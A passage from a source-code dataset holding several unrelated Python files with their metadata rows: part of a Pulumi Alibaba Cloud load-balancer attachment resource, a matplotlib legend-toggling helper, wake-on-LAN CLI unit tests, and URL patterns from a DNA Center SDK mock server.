            pulumi.set(__self__, "delete_protection_validation", delete_protection_validation)
        if instance_ids is not None:
            pulumi.set(__self__, "instance_ids", instance_ids)
        if load_balancer_id is not None:
            pulumi.set(__self__, "load_balancer_id", load_balancer_id)
        if server_type is not None:
            pulumi.set(__self__, "server_type", server_type)
        if weight is not None:
            pulumi.set(__self__, "weight", weight)

    # Getter/setter pairs delegate storage to the pulumi runtime; the
    # pulumi.getter(name=...) wire names must stay in sync with the schema.
    @property
    @pulumi.getter(name="backendServers")
    def backend_servers(self) -> Optional[pulumi.Input[str]]:
        """
        The backend servers of the load balancer.
        """
        return pulumi.get(self, "backend_servers")

    @backend_servers.setter
    def backend_servers(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "backend_servers", value)

    @property
    @pulumi.getter(name="deleteProtectionValidation")
    def delete_protection_validation(self) -> Optional[pulumi.Input[bool]]:
        """
        Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        """
        return pulumi.get(self, "delete_protection_validation")

    @delete_protection_validation.setter
    def delete_protection_validation(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "delete_protection_validation", value)

    @property
    @pulumi.getter(name="instanceIds")
    def instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of instance ids to added backend server in the SLB.
        """
        return pulumi.get(self, "instance_ids")

    @instance_ids.setter
    def instance_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "instance_ids", value)

    @property
    @pulumi.getter(name="loadBalancerId")
    def load_balancer_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the load balancer.
        """
        return pulumi.get(self, "load_balancer_id")

    @load_balancer_id.setter
    def load_balancer_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "load_balancer_id", value)

    @property
    @pulumi.getter(name="serverType")
    def server_type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of the instances. Valid value ecs, eni. Default to ecs.
        """
        return pulumi.get(self, "server_type")

    @server_type.setter
    def server_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "server_type", value)

    @property
    @pulumi.getter
    def weight(self) -> Optional[pulumi.Input[int]]:
        """
        Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        return pulumi.get(self, "weight")

    @weight.setter
    def weight(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "weight", value)
class Attachment(pulumi.CustomResource):
    """An SLB load balancer attachment resource (``alicloud:slb/attachment:Attachment``)."""
    # The two @overload signatures below exist only for type checkers; the
    # real __init__ dispatches on the actual argument types at runtime.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 backend_servers: Optional[pulumi.Input[str]] = None,
                 delete_protection_validation: Optional[pulumi.Input[bool]] = None,
                 instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 load_balancer_id: Optional[pulumi.Input[str]] = None,
                 server_type: Optional[pulumi.Input[str]] = None,
                 weight: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        ## Import

        Load balancer attachment can be imported using the id or load balancer id, e.g.

        ```sh
         $ pulumi import alicloud:slb/attachment:Attachment example lb-abc123456
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
        :param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
        :param pulumi.Input[str] load_balancer_id: ID of the load balancer.
        :param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
        :param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: AttachmentArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        ## Import

        Load balancer attachment can be imported using the id or load balancer id, e.g.

        ```sh
         $ pulumi import alicloud:slb/attachment:Attachment example lb-abc123456
        ```

        :param str resource_name: The name of the resource.
        :param AttachmentArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads: either a pre-built
        # AttachmentArgs bag or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(AttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       backend_servers: Optional[pulumi.Input[str]] = None,
                       delete_protection_validation: Optional[pulumi.Input[bool]] = None,
                       instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       load_balancer_id: Optional[pulumi.Input[str]] = None,
                       server_type: Optional[pulumi.Input[str]] = None,
                       weight: Optional[pulumi.Input[int]] = None,
                       __props__=None):
        # Validate / default the resource options before registering.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the property bag from scratch.
            # __new__ bypasses AttachmentArgs.__init__ and its required-arg
            # checks; required properties are validated explicitly below.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = AttachmentArgs.__new__(AttachmentArgs)

            __props__.__dict__["backend_servers"] = backend_servers
            __props__.__dict__["delete_protection_validation"] = delete_protection_validation
            # instance_ids / load_balancer_id are required unless the
            # resource is being looked up by URN (opts.urn set).
            if instance_ids is None and not opts.urn:
                raise TypeError("Missing required property 'instance_ids'")
            __props__.__dict__["instance_ids"] = instance_ids
            if load_balancer_id is None and not opts.urn:
                raise TypeError("Missing required property 'load_balancer_id'")
            __props__.__dict__["load_balancer_id"] = load_balancer_id
            __props__.__dict__["server_type"] = server_type
            __props__.__dict__["weight"] = weight
        super(Attachment, __self__).__init__(
            'alicloud:slb/attachment:Attachment',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            backend_servers: Optional[pulumi.Input[str]] = None,
            delete_protection_validation: Optional[pulumi.Input[bool]] = None,
            instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            load_balancer_id: Optional[pulumi.Input[str]] = None,
            server_type: Optional[pulumi.Input[str]] = None,
            weight: Optional[pulumi.Input[int]] = None) -> 'Attachment':
        """
        Get an existing Attachment resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
        :param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
        :param pulumi.Input[str] load_balancer_id: ID of the load balancer.
        :param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
        :param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        # Attach the provider id so the engine performs a lookup instead of
        # creating a new resource.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # __new__ bypasses _AttachmentState.__init__; the state bag is
        # populated directly (None values simply mean "unknown").
        __props__ = _AttachmentState.__new__(_AttachmentState)

        __props__.__dict__["backend_servers"] = backend_servers
        __props__.__dict__["delete_protection_validation"] = delete_protection_validation
        __props__.__dict__["instance_ids"] = instance_ids
        __props__.__dict__["load_balancer_id"] = load_balancer_id
        __props__.__dict__["server_type"] = server_type
        __props__.__dict__["weight"] = weight
        return Attachment(resource_name, opts=opts, __props__=__props__)

    # Read-only output properties resolved by the pulumi engine.
    @property
    @pulumi.getter(name="backendServers")
    def backend_servers(self) -> pulumi.Output[str]:
        """
        The backend servers of the load balancer.
        """
        return pulumi.get(self, "backend_servers")

    @property
    @pulumi.getter(name="deleteProtectionValidation")
    def delete_protection_validation(self) -> pulumi.Output[Optional[bool]]:
        """
        Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
        """
        return pulumi.get(self, "delete_protection_validation")

    @property
    @pulumi.getter(name="instanceIds")
    def instance_ids(self) -> pulumi.Output[Sequence[str]]:
        """
        A list of instance ids to added backend server in the SLB.
        """
        return pulumi.get(self, "instance_ids")

    @property
    @pulumi.getter(name="loadBalancerId")
    def load_balancer_id(self) -> pulumi.Output[str]:
        """
        ID of the load balancer.
        """
        return pulumi.get(self, "load_balancer_id")

    @property
    @pulumi.getter(name="serverType")
    def server_type(self) -> pulumi.Output[Optional[str]]:
        """
        Type of the instances. Valid value ecs, eni. Default to ecs.
        """
        return pulumi.get(self, "server_type")

    @property
    @pulumi.getter
    def weight(self) -> pulumi.Output[Optional[int]]:
        """
        Weight of the instances. Valid value range: [0-100]. Default to 100.
        """
        return pulumi.get(self, "weight")
| 45.589421 | 231 | 0.661584 | 2,158 | 18,099 | 5.31279 | 0.078777 | 0.091147 | 0.06594 | 0.046053 | 0.85495 | 0.839686 | 0.827998 | 0.815526 | 0.811077 | 0.791452 | 0 | 0.004501 | 0.238963 | 18,099 | 396 | 232 | 45.704545 | 0.827864 | 0.297641 | 0 | 0.733906 | 1 | 0 | 0.111889 | 0.030715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158798 | false | 0.004292 | 0.021459 | 0 | 0.274678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c4c2a5455d730a2e4fe67e342c6434f75191c5a9 | 7,013 | py | Python | src/scrawl/moves/legend.py | astromancer/graphical | 2d72407c53967714953485dd52ad72e34e549ef5 | [
"MIT"
] | null | null | null | src/scrawl/moves/legend.py | astromancer/graphical | 2d72407c53967714953485dd52ad72e34e549ef5 | [
"MIT"
] | null | null | null | src/scrawl/moves/legend.py | astromancer/graphical | 2d72407c53967714953485dd52ad72e34e549ef5 | [
"MIT"
] | null | null | null | from matplotlib.lines import Line2D
from matplotlib.container import ErrorbarContainer
from scrawl.connect import ConnectionMixin, mpl_connect
class DynamicLegend(ConnectionMixin):
    """
    Enables toggling marker / bar / cap visibility by selecting on the legend.
    """
    # TODO: subclass Legend??

    # Defaults merged with (and overridden by) user-supplied legend kwargs.
    _default_legend = dict(fancybox=True,
                           framealpha=0.5)

    def __init__(self, ax, plots, legendkw=None):
        """
        Create a legend on *ax* and enable picking on its handles.

        Parameters
        ----------
        ax : matplotlib Axes
            Axes whose artists will be toggled through the legend.
        plots : sequence
            Plot artists, in the same order as the legend handles.
        legendkw : dict, optional
            Extra keyword arguments forwarded to ``ax.legend``.
        """
        # initialize auto-connect
        ConnectionMixin.__init__(self, ax.figure)

        # NOTE: legend picking only works for labelled artists -- unlabelled
        # artists produce no legend entry, so there is nothing to pick.

        # Merge user options into a *copy* of the defaults.  Updating the
        # class-level dict in place (the previous behaviour) leaked options
        # from one instance into every later one.
        lkw = dict(self._default_legend)
        if legendkw:
            lkw.update(legendkw)

        # mapping between picked legend handles and the original (axes)
        # artists; always defined so `on_pick` is safe even when no legend
        # gets created (i.e. no labelled artists).
        self.to_orig = {}

        # create the legend (ax.legend returns None when nothing is labelled)
        self.legend = ax.legend(**lkw)
        if self.legend:
            # enable legend picking by setting a pick radius on each handle
            for handle, origart in zip(self.legend.legendHandles, plots):
                handle.set_pickradius(10)
                self.to_orig[handle] = origart

    @mpl_connect('pick_event')
    def on_pick(self, event):
        """Pick event handler: toggle the artist tied to the picked handle."""
        if event.artist in self.to_orig:
            self.toggle_vis(event)

    def toggle_vis(self, event):
        """
        On the pick event, find the orig line corresponding to the
        legend proxy line, and toggle the visibility.
        """
        # Toggle visibility of the axes artist
        art = self.to_orig[event.artist]
        vis = not art.get_visible()
        art.set_visible(vis)

        # dim the legend handle when the artist is hidden
        event.artist.set_alpha(1.0 if vis else 0.2)

        # TODO: BLIT
        self.canvas.draw()
# class DynamicLegend(ConnectionMixin): # TODO: move to seperate script....
# # TODO: subclass Legend??
# '''
# Enables toggling marker / bar / cap visibility by selecting on the legend.
# '''
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# _default_legend = dict(fancybox=True,
# framealpha=0.5,
# handler_map={ErrorbarContainer:
# ReorderedErrorbarHandler(numpoints=1)})
# label_map = {ErrorbarContainer: 'errorbar{}',
# Line2D: 'line{}'}
#
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# def __init__(self, ax, plots, legendkw={}):
# '''enable legend picking'''
#
# # initialize auto-connect
# ConnectionMixin.__init__(self, ax.figure)
#
# # Auto-generate labels
# # NOTE: This needs to be done to enable legend picking. if the artists
# # are unlabeled, no legend will be created and we therefor cannot pick them!
# i = 0
# for plot in plots:
# if not plot.get_label():
# lbl = self.label_map[type(plot)].format(i)
# plot.set_label(lbl)
# i += 1
#
# # update default legend props with user specified props
# lkw = self._default_legend
# lkw.update(legendkw)
#
# # create the legend
#
# # print('PING!!'*10 )
# # embed()
#
# # self.legend = ax.legend( plots, labels, **lkw )
# self.legend = ax.legend(**lkw)
#
# if self.legend: # if no labels --> no legend, and we are done!
# # create mapping between the picked legend artists (markers), and the
# # original (axes) artists
# self.to_orig = {}
# self.to_leg = {}
# self.to_handle = {}
#
# # enable legend picking by setting the picker method
# for handel, origart in zip(self.legend.legendHandles, plots): # get_lines()
# self.to_orig[handel.markers] = NamedErrorbarContainer(origart)
# self.to_leg[handel.markers] = handel
# self.to_handle[origart[0]] = handel
#
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# @mpl_connect('pick_event')
# def on_pick(self, event):
# '''Pick event handler.'''
# if event.artist in self.to_orig:
# self.toggle_vis(event)
#
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # @unhookPyQt
# def toggle_vis(self, event):
# '''
# on the pick event, find the orig line corresponding to the
# legend proxy line, and toggle the visibility.
# '''
#
# def get_part(mapping, event):
# part = getattr(mapping[event.artist], event.part)
#
# if event.part in ('stems', 'caps'):
# artists = getattr(part, event.partxy)
# else:
# artists = part
#
# yield from flatten([artists])
#
# for art in get_part(self.to_orig, event):
# vis = not art.get_visible()
# art.set_visible(vis)
#
# for art in get_part(self.to_leg, event):
# art.set_alpha(1.0 if vis else 0.2)
#
# # FIXME UnboundLocalError: local variable 'vis' referenced before assignment
# # TODO: BLIT
# self.canvas.draw() | 38.11413 | 111 | 0.477542 | 674 | 7,013 | 4.85905 | 0.218101 | 0.031145 | 0.024427 | 0.021985 | 0.801221 | 0.774351 | 0.774351 | 0.741985 | 0.741985 | 0.720611 | 0 | 0.006019 | 0.31299 | 7,013 | 184 | 112 | 38.11413 | 0.673724 | 0.741338 | 0 | 0 | 0 | 0 | 0.006223 | 0 | 0 | 0 | 0 | 0.01087 | 0 | 1 | 0.107143 | false | 0 | 0.107143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1eeddb65ebb71a4f7897ace85bb8b5cf1aa2284b | 6,329 | py | Python | tests/test_wolproxycli.py | bateman/wolproxypycli | be9677939ea14880b5405a78457deecdfad79eba | [
"MIT"
] | null | null | null | tests/test_wolproxycli.py | bateman/wolproxypycli | be9677939ea14880b5405a78457deecdfad79eba | [
"MIT"
] | null | null | null | tests/test_wolproxycli.py | bateman/wolproxypycli | be9677939ea14880b5405a78457deecdfad79eba | [
"MIT"
] | null | null | null | """Unit tests for the core module."""
import socket
from unittest.mock import Mock, call, patch
import pytest
import wolproxypycli.main as wolproxy
@pytest.mark.parametrize(
    "mac,packet",
    [
        (
            "000000000000",
            # 6-byte broadcast preamble + MAC repeated 16 times
            b"\xff\xff\xff\xff\xff\xff" + b"\x00" * 96,
        ),
        (
            "01:23:45:67:89:ab",
            b"\xff\xff\xff\xff\xff\xff" + b"\x01\x23\x45\x67\x89\xab" * 16,
        ),
        (
            "ff-ff-ff-ff-ff-ff",
            b"\xff" * 102,
        ),
    ],
    ids=["no separator", "colons", "hyphens"],
)
@patch("socket.socket")
def test_wol(sock: Mock, mac: str, packet: bytes) -> None:
    """Test whether the magic packets are broadcasted to the specified network.

    Fix: the parametrized ``mac``/``packet`` arguments were previously not
    accepted by the function (pytest errors on unused parametrize argnames)
    and the body hard-coded a single MAC, so the three MAC formats were
    never exercised.
    """
    wolproxy.wol(mac, ip="example.com", port=7)
    assert sock.mock_calls == [
        call(socket.AF_INET, socket.SOCK_DGRAM),
        call().__enter__(),
        call().__enter__().setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1),
        call().__enter__().connect(("example.com", 7)),
        call().__enter__().send(packet),
        call().__exit__(None, None, None),
    ]
@patch("socket.socket")
def test_wol_default(sock: Mock) -> None:
    """Test whether the magic packets are broadcasted using default values."""
    wolproxy.wol("133713371337")
    # Magic packet: 6 x 0xff preamble followed by the MAC repeated 16 times.
    magic = b"\xff" * 6 + b"\x13\x37" * 48
    expected = [
        call(socket.AF_INET, socket.SOCK_DGRAM),
        call().__enter__(),
        call().__enter__().setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1),
        call().__enter__().connect(("255.255.255.255", 9)),
        call().__enter__().send(magic),
        call().__exit__(None, None, None),
    ]
    assert sock.mock_calls == expected
@patch("socket.socket")
def test_wol_interface(sock: Mock) -> None:
    """Test whether the magic packets are broadcasted to the specified network via specified interface."""
    wolproxy.wol(
        "133713371337",
        ip="example.com",
        port=7,
        interface="192.168.0.2",
    )
    # Magic packet: 6 x 0xff preamble followed by the MAC repeated 16 times.
    magic = b"\xff" * 6 + b"\x13\x37" * 48
    expected = [
        call(socket.AF_INET, socket.SOCK_DGRAM),
        call().__enter__(),
        # The socket is bound to the requested interface before broadcasting.
        call().__enter__().bind(("192.168.0.2", 0)),
        call().__enter__().setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1),
        call().__enter__().connect(("example.com", 7)),
        call().__enter__().send(magic),
        call().__exit__(None, None, None),
    ]
    assert sock.mock_calls == expected
@patch("wolproxypycli.main.wol")
def test_main(wol: Mock) -> None:
    """Test if processed arguments are passed to wol.

    Fix: the patch target was ``wolproxy_py.main.wol`` — a nonexistent
    module (this file imports ``wolproxypycli.main``), which made the
    decorator raise ModuleNotFoundError at test time.
    """
    wolproxy.wolproxy_cli(["00:11:22:33:44:55", "-i", "host.example", "-p", "1337"])
    wolproxy.wolproxy_cli(["00:11:22:33:44:55", "-i", "host.example", "-p", "1337", "-n", "192.168.0.2"])
    assert wol.mock_calls == [
        call("00:11:22:33:44:55", ip="host.example", port=1337, interface=None),
        call(
            "00:11:22:33:44:55",
            ip="host.example",
            port=1337,
            interface="192.168.0.2",
        ),
    ]
| 31.964646 | 106 | 0.497867 | 881 | 6,329 | 3.473326 | 0.119183 | 0.215686 | 0.258824 | 0.258824 | 0.866667 | 0.85 | 0.841176 | 0.841176 | 0.802614 | 0.802614 | 0 | 0.201212 | 0.322326 | 6,329 | 197 | 107 | 32.126904 | 0.512241 | 0.052299 | 0 | 0.752747 | 0 | 0 | 0.382619 | 0.152713 | 0 | 0 | 0 | 0 | 0.021978 | 1 | 0.021978 | false | 0 | 0.021978 | 0 | 0.043956 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
480c8ab24398b0f79f54ac721843ebb3bf2f544a | 248,626 | py | Python | tests/mock/server/v1_3_0.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 32 | 2019-09-05T05:16:56.000Z | 2022-03-22T09:50:38.000Z | tests/mock/server/v1_3_0.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 35 | 2019-09-07T18:58:54.000Z | 2022-03-24T19:29:36.000Z | tests/mock/server/v1_3_0.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 18 | 2019-09-09T11:07:21.000Z | 2022-03-25T08:49:59.000Z | from http.server import BaseHTTPRequestHandler
import re
import json
import requests
class MockServerRequestHandler_v1_3_0(BaseHTTPRequestHandler):
AUTHENTICATION_ac8ae94c4e69a09d_PATTERN = re.compile(r"/dna/system/api/v1/auth/token")
TEMPLATE_PROGRAMMER_00aec9b1422ab27e_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project")
TEMPLATE_PROGRAMMER_01b09a254b9ab259_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template")
TEMPLATE_PROGRAMMER_109d1b4f4289aecd_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project")
TEMPLATE_PROGRAMMER_6099da82477b858a_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/deploy")
TEMPLATE_PROGRAMMER_7781fa0548a98342_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template")
TEMPLATE_PROGRAMMER_9480fa1f47ca9254_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project")
TEMPLATE_PROGRAMMER_a7b42836408a8e74_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/string")
TEMPLATE_PROGRAMMER_f393abe84989bb48_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/preview")
TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/version/string")
TEMPLATE_PROGRAMMER_62b05b2c40a9b216_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/version")
TEMPLATE_PROGRAMMER_83a3b9404cb88787_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/string")
TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project/string/template")
TEMPLATE_PROGRAMMER_9c9a785741cbb41f_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/deploy/status/string")
TEMPLATE_PROGRAMMER_d0a1abfa435b841d_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project/string")
TAG_00a2fa6146089317_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member")
TAG_1399891c42a8be64_PATTERN = re.compile(r"/dna/intent/api/v1/tag")
TAG_429c28154bdaa13d_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string")
TAG_2e9db85840fbb1cf_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member/count")
TAG_4695090d403b8eaa_PATTERN = re.compile(r"/dna/intent/api/v1/tag/member/type")
TAG_45bc7a8344a8bc1e_PATTERN = re.compile(r"/dna/intent/api/v1/tag/member")
TAG_4d86a993469a9da9_PATTERN = re.compile(r"/dna/intent/api/v1/tag")
TAG_8091a9b84bfba53b_PATTERN = re.compile(r"/dna/intent/api/v1/tag/count")
TAG_c1a359b14c89b573_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string")
TAG_eab7abe048fb99ad_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member")
TAG_caa3ea704d78b37e_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member/string")
TAG_ee9aab01487a8896_PATTERN = re.compile(r"/dna/intent/api/v1/tag")
NETWORK_DISCOVERY_069d9823451b892d_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/count")
NETWORK_DISCOVERY_17929bc7465bb564_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/netconf")
NETWORK_DISCOVERY_10b06a6a4f7bb3cb_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-write-community")
NETWORK_DISCOVERY_1da5ebdd434aacfe_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv3")
NETWORK_DISCOVERY_47a1b84b4e1b8044_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-read-community")
NETWORK_DISCOVERY_33b799d04d0a8907_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/0/0")
NETWORK_DISCOVERY_3d9b99c343398a27_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/summary")
NETWORK_DISCOVERY_4d9ca8e2431a8a24_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-write")
NETWORK_DISCOVERY_44974ba5435a801d_PATTERN = re.compile(r"/dna/intent/api/v1/snmp-property")
NETWORK_DISCOVERY_4c8cab5f435a80f4_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string")
NETWORK_DISCOVERY_55b439dc4239b140_PATTERN = re.compile(r"/dna/intent/api/v1/discovery")
NETWORK_DISCOVERY_63bb88b74f59aa17_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string")
NETWORK_DISCOVERY_6bacb8d14639bdc7_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-write-community")
NETWORK_DISCOVERY_948ea8194348bc0b_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/cli")
NETWORK_DISCOVERY_89b36b4649999d81_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-read")
NETWORK_DISCOVERY_99872a134d0a9fb4_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/job")
NETWORK_DISCOVERY_979688084b7ba60d_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv3")
NETWORK_DISCOVERY_a5ac99774c6bb541_PATTERN = re.compile(r"/dna/intent/api/v1/snmp-property")
NETWORK_DISCOVERY_9788b8fc4418831d_PATTERN = re.compile(r"/dna/intent/api/v1/discovery")
NETWORK_DISCOVERY_b68a6bd8473a9a25_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-write")
NETWORK_DISCOVERY_c1ba9a424c08a01b_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/0/0")
NETWORK_DISCOVERY_db8e09234a988bab_PATTERN = re.compile(r"/dna/intent/api/v1/discovery")
NETWORK_DISCOVERY_a6965b454c9a8663_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/network-device/count")
NETWORK_DISCOVERY_f5ac590c4ca9975a_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/string")
NETWORK_DISCOVERY_fba0d80747eb82e8_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/cli")
NETWORK_DISCOVERY_bf859ac64a0ba19c_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-read")
NETWORK_DISCOVERY_c5acd9fa4c1a8abc_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/netconf")
NETWORK_DISCOVERY_58a3699e489b9529_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/string")
NETWORK_DISCOVERY_709fda3c42b8877a_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/string")
NETWORK_DISCOVERY_7aa3da9d4e098ef2_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-read-community")
NETWORK_DISCOVERY_a4967be64dfaaa1a_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/job")
NETWORK_DISCOVERY_a6b798ab4acaa34e_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/network-device/0/0")
NETWORK_DISCOVERY_ff816b8e435897eb_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential")
NETWORK_DISCOVERY_f6ac994f451ba011_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/network-device")
TASK_26b44ab04649a183_PATTERN = re.compile(r"/dna/intent/api/v1/task/count")
TASK_a1a9387346ba92b1_PATTERN = re.compile(r"/dna/intent/api/v1/task/string")
TASK_e78bb8a2449b9eed_PATTERN = re.compile(r"/dna/intent/api/v1/task")
TASK_f5a269c44f2a95fa_PATTERN = re.compile(r"/dna/intent/api/v1/task/string/tree")
TASK_e487f8d3481b94f2_PATTERN = re.compile(r"/dna/intent/api/v1/task/operation/string/0/0")
